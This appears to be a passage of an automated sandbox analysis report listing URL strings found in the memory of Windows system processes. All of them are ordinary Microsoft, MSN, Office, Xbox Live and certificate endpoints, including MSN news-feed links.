    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3379362084.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FAC000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222070333.000001F697FA4000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2282353557.0000027A7E0DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2282517479.0000027A7E15E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
    Source: SearchApp.exe, 0000000D.00000000.2282425797.0000027A7E134000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
    Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
    Source: explorer.exe, 00000004.00000000.2194969646.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194982780.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193205458.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000B.00000002.3372811032.000002C8A67C0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
    Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
    Source: svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
    Source: explorer.exe, 00000004.00000003.2979250085.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979898080.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076151253.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076523652.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450962269.000000000C4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
    Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comt
    Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
    Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
    Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2264186736.000002727C2B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
    Source: explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
    Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
    Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comP
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
    Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
    Source: svchost.exe, 00000007.00000000.2222215269.000001F698700000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3383112196.000001F698700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
    Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com-
    Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.coms
    Source: SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
    Source: SearchApp.exe, 0000000D.00000000.2281804728.0000027A7DEF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
    Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
    Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2300739349.0000027A8007D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284459655.0000027A7E313000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284459655.0000027A7E313000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
    Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
    Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
    Source: SearchApp.exe, 0000000D.00000000.2274494136.0000027A7D51C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2301318078.0000027A80184000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
    Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
    Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
    Source: SearchApp.exe, 0000000D.00000000.2325343319.0000027A916C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2d
    Source: SearchApp.exe, 0000000D.00000000.2318850916.0000027A91528000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.AccessZ
    Source: explorer.exe, 00000004.00000000.2198248903.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
    Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcembere
    Source: SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
    Source: SearchApp.exe, 0000000D.00000000.2329926503.0000027A91A9C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2306685905.0000027A809C7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2331674767.0000027A91B30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
    Source: SearchApp.exe, 0000000D.00000000.2329609042.0000027A91A70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access
    Source: SearchApp.exe, 0000000D.00000000.2286028809.0000027A7E508000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
    Source: SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/dsapi/v1.0/
    Source: SearchApp.exe, 0000000D.00000000.2281866725.0000027A7DF30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.com
    Source: SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
    Source: explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/j
    Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
    Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"
    Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"
    Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"
    Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"
    Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"
    Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMore"
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
    Source: SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
    Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=w
    Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
    Source: SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
    Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
    Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
    Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
    Source: SearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comwy
